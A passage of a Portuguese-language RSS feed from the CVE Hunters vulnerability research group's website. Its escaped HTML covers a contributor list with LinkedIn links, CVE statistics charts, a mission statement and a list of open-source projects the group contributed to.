        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;&amp;gt;Repositório&amp;lt;br&amp;gt;Oficial&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;</description><content:encoded>&amp;lt;p&amp;gt;Você pode encontrar links úteis para repositórios e colaboradores abaixo:&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;fundador&amp;#34;&amp;gt;Fundador
&amp;lt;/h2&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; style=&amp;#34;max-width: 155px;&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/natan.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;&amp;gt;Natan Maia&amp;lt;br /&amp;gt; Morette&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;h2 id=&amp;#34;colaboradores&amp;#34;&amp;gt;Colaboradores
&amp;lt;/h2&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/angelo.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/diego.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/elisangela.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;&amp;gt;Angelo&amp;lt;br /&amp;gt;Morette&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;&amp;gt;Diego&amp;lt;br /&amp;gt;Castro&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;&amp;gt;Elisângela&amp;lt;br /&amp;gt;Mendonça&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/f%C3%AAmartins/&amp;#34;&amp;gt;
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/isadora-cristina-a0580014b/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/isadora.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/itauan&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/itauan.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/f%C3%AAmartins/&amp;#34;&amp;gt;Fernanda&amp;lt;br /&amp;gt;Martins&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/isadora-cristina-a0580014b/&amp;#34;&amp;gt;Isadora&amp;lt;br /&amp;gt;Novaes&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/itauan&amp;#34;&amp;gt;Itauan&amp;lt;br /&amp;gt;Santos&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/karina.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/marcelo.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/marcos-tolosa/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/marcos.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;&amp;gt;Karina&amp;lt;br /&amp;gt;Gante&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;&amp;gt;Marcelo&amp;lt;br /&amp;gt;Queiroz&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/marcos-tolosa/&amp;#34;&amp;gt;Marcos&amp;lt;br /&amp;gt;Tolosa&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&amp;amp;utm_campaign=share_via&amp;amp;utm_content=profile&amp;amp;utm_medium=android_app&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/pedro.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/rafael.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/raul.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&amp;amp;utm_campaign=share_via&amp;amp;utm_content=profile&amp;amp;utm_medium=android_app&amp;#34;&amp;gt;Pedro&amp;lt;br /&amp;gt;Lyrio&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;&amp;gt;Rafael&amp;lt;br /&amp;gt;Corvino&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;&amp;gt;Raul&amp;lt;br /&amp;gt;Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/samaragama?utm_source=share&amp;amp;utm_campaign=share_via&amp;amp;utm_content=profile&amp;amp;utm_medium=ios_app&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/samara.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/ta%C3%ADza-oliveira&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/taiza.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://br.linkedin.com/in/thiagoescarrone&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/thiago.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/samaragama?utm_source=share&amp;amp;utm_campaign=share_via&amp;amp;utm_content=profile&amp;amp;utm_medium=ios_app&amp;#34;&amp;gt;Samara&amp;lt;br /&amp;gt;Gama&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/ta%C3%ADza-oliveira&amp;#34;&amp;gt;Taíza&amp;lt;br /&amp;gt;Oliveira&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://br.linkedin.com/in/thiagoescarrone&amp;#34;&amp;gt;Thiago&amp;lt;br /&amp;gt;Escarrone&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/vanderlei-princival/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/vanderlei.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;http://www.linkedin.com/in/vinicius-gross-castro&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/viniciusCastro.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt;
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/vinicius-marim-melfi-4b937b155/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/vinicius.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/vanderlei-princival/&amp;#34;&amp;gt;Vanderlei&amp;lt;br /&amp;gt;Princival&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;http://www.linkedin.com/in/vinicius-gross-castro&amp;#34;&amp;gt;Vinicius&amp;lt;br /&amp;gt;Castro&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/vinicius-marim-melfi-4b937b155/&amp;#34;&amp;gt;Vinícius&amp;lt;br /&amp;gt;Melfi&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/yago-dyogennes/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/yago.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/yago-dyogennes/&amp;#34;&amp;gt;Yago&amp;lt;br /&amp;gt;Dyogennes&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;h2 id=&amp;#34;repositório&amp;#34;&amp;gt;Repositório
&amp;lt;/h2&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; style=&amp;#34;max-width: 155px;&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/team/cve-hunters-logo.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;&amp;gt;Repositório&amp;lt;br /&amp;gt;Oficial&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;</content:encoded>
        <pubDate>Mon, 01 Jan 0001 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>Métricas</title>
        <link>https://www.cvehunters.com/pt/stats/</link>
        <guid>https://www.cvehunters.com/pt/stats/</guid>
        <description>&amp;lt;p&amp;gt;Todas as estatísticas de CVEs registradas pela equipe do CVE-Hunters:&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;total-de-cves-registrados&amp;#34;&amp;gt;Total de CVEs registrados
&amp;lt;/h3&amp;gt;&amp;lt;img src=&amp;#34;/stats/totalCVEsRegistred.png&amp;#34; width=100% height=100&amp;gt;
&amp;lt;h3 id=&amp;#34;quem-mais-encontrou-cves&amp;#34;&amp;gt;Quem mais encontrou CVEs
&amp;lt;/h3&amp;gt;&amp;lt;img src=&amp;#34;/stats/topFinderss.png&amp;#34; width=100% height=100&amp;gt;
&amp;lt;h3 id=&amp;#34;tipos-de-vulnerabilidades&amp;#34;&amp;gt;Tipos de vulnerabilidades
&amp;lt;/h3&amp;gt;&amp;lt;img src=&amp;#34;/stats/vulnerabilityType.png&amp;#34; width=100% height=100&amp;gt;
&amp;lt;h3 id=&amp;#34;severidade&amp;#34;&amp;gt;Severidade
&amp;lt;/h3&amp;gt;&amp;lt;img src=&amp;#34;/stats/severity.png&amp;#34; width=100% height=100&amp;gt;
&amp;lt;h3 id=&amp;#34;histórico-de-estrelas-do-repositório&amp;#34;&amp;gt;Histórico de Estrelas do Repositório
&amp;lt;/h3&amp;gt;&amp;lt;img src=&amp;#34;https://api.star-history.com/svg?repos=CVE-Hunters/cve-hunters&amp;amp;type=Date&amp;#34; width=100% height=100&amp;gt;</description><content:encoded>&amp;lt;p&amp;gt;Todas as estatísticas de CVEs registradas pela equipe do CVE-Hunters:&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;total-de-cves-registrados&amp;#34;&amp;gt;Total de CVEs registrados
&amp;lt;/h3&amp;gt;&amp;lt;img src=&amp;#34;/stats/totalCVEsRegistred.png&amp;#34; width=100% height=100 /&amp;gt;
&amp;lt;h3 id=&amp;#34;quem-mais-encontrou-cves&amp;#34;&amp;gt;Quem mais encontrou CVEs
&amp;lt;/h3&amp;gt;&amp;lt;img src=&amp;#34;/stats/topFinderss.png&amp;#34; width=100% height=100 /&amp;gt;
&amp;lt;h3 id=&amp;#34;tipos-de-vulnerabilidades&amp;#34;&amp;gt;Tipos de vulnerabilidades
&amp;lt;/h3&amp;gt;&amp;lt;img src=&amp;#34;/stats/vulnerabilityType.png&amp;#34; width=100% height=100 /&amp;gt;
&amp;lt;h3 id=&amp;#34;severidade&amp;#34;&amp;gt;Severidade
&amp;lt;/h3&amp;gt;&amp;lt;img src=&amp;#34;/stats/severity.png&amp;#34; width=100% height=100 /&amp;gt;
&amp;lt;h3 id=&amp;#34;histórico-de-estrelas-do-repositório&amp;#34;&amp;gt;Histórico de Estrelas do Repositório
&amp;lt;/h3&amp;gt;&amp;lt;img src=&amp;#34;https://api.star-history.com/svg?repos=CVE-Hunters/cve-hunters&amp;amp;type=Date&amp;#34; width=100% height=100 /&amp;gt;
</content:encoded>
        <pubDate>Mon, 01 Jan 0001 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>Pesquisa</title>
        <link>https://www.cvehunters.com/pt/search/</link>
        <guid>https://www.cvehunters.com/pt/search/</guid>
        <description></description><content:encoded></content:encoded>
        <pubDate>Mon, 01 Jan 0001 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>Sobre</title>
        <link>https://www.cvehunters.com/pt/about/</link>
        <guid>https://www.cvehunters.com/pt/about/</guid>
        <description>&amp;lt;div align=&amp;#34;center&amp;#34; width=100% &amp;gt;
&amp;lt;h1 id=&amp;#34;cve-hunters&amp;#34;&amp;gt;CVE Hunters
&amp;lt;/h1&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Grupo de Pesquisa em Vulnerabilidade 🔎&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;a href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://img.shields.io/badge/CVE_Hunters_ᯤ-6407ab&amp;#34; /&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;&amp;#34;&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;div align=&amp;#34;justify&amp;#34;&amp;gt;
  &amp;lt;h3&amp;gt;Nossa Missão 🚀&amp;lt;/h3&amp;gt;
  &amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;https://img.shields.io/badge/I-6407ab&amp;#34; /&amp;gt; 
    Identificar e documentar vulnerabilidades em projetos de código aberto amplamente utilizados pela comunidade, contribuindo para a melhoria contínua de sua postura de segurança da informação;
  &amp;lt;/p&amp;gt;
  &amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;https://img.shields.io/badge/II-6407ab&amp;#34; /&amp;gt; 
    Promover a formação prática de novos profissionais na área de segurança da informação, proporcionando aos alunos experiência prática e realista nos processos de identificação, relato e remediação de vulnerabilidades;
  &amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;div align=&amp;#34;center&amp;#34; width=100% &amp;gt;
&amp;lt;h1 id=&amp;#34;cve-hunters&amp;#34;&amp;gt;CVE Hunters
&amp;lt;/h1&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Grupo de Pesquisa em Vulnerabilidade 🔎&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;a href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://img.shields.io/badge/CVE_Hunters_ᯤ-6407ab&amp;#34; / /&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;&amp;#34;&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;div align=&amp;#34;justify&amp;#34;&amp;gt;
  &amp;lt;h3&amp;gt;Nossa Missão 🚀&amp;lt;/h3&amp;gt;
  &amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;https://img.shields.io/badge/I-6407ab&amp;#34; / /&amp;gt; 
    Identificar e documentar vulnerabilidades em projetos de código aberto amplamente utilizados pela comunidade, contribuindo para a melhoria contínua de sua postura de segurança da informação;
  &amp;lt;/p&amp;gt;
  &amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;https://img.shields.io/badge/II-6407ab&amp;#34; / /&amp;gt; 
    Promover a formação prática de novos profissionais na área de segurança da informação, proporcionando aos alunos experiência prática e realista nos processos de identificação, relato e remediação de vulnerabilidades;
  &amp;lt;/p&amp;gt;
  &amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;https://img.shields.io/badge/III-6407ab&amp;#34; / /&amp;gt; 
    Promover a colaboração na área de segurança da informação, incentivando outros pesquisadores a contribuírem para a publicação de CVEs, aumentando assim a visibilidade dos projetos e mitigando os riscos de segurança cibernética.
  &amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;projetos-contribuídos&amp;#34;&amp;gt;Projetos Contribuídos
&amp;lt;/h3&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/wegia.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;WeGIA&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/portabilis/i-educar&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/i-educar.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;i-Educar&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/portabilis/i-diario&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/i-diario.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;i-Diário&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
